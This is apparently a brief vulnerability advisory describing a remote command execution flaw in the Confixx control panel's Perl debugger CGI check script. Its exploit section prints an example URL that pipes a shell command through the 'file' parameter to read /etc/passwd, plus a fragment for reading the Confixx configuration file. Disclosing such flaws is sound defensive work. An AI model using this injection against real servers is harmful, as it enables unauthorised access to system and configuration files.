Confixx Perl Debugger Remote Command Execution Vulnerability

info
discussion
exploit
solution
references

Confixx Perl Debugger Remote Command Execution Vulnerability

There is no exploit required; the following example has been supplied:

; /bin/cat location_of_Confixx_config_file
http://www.example.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd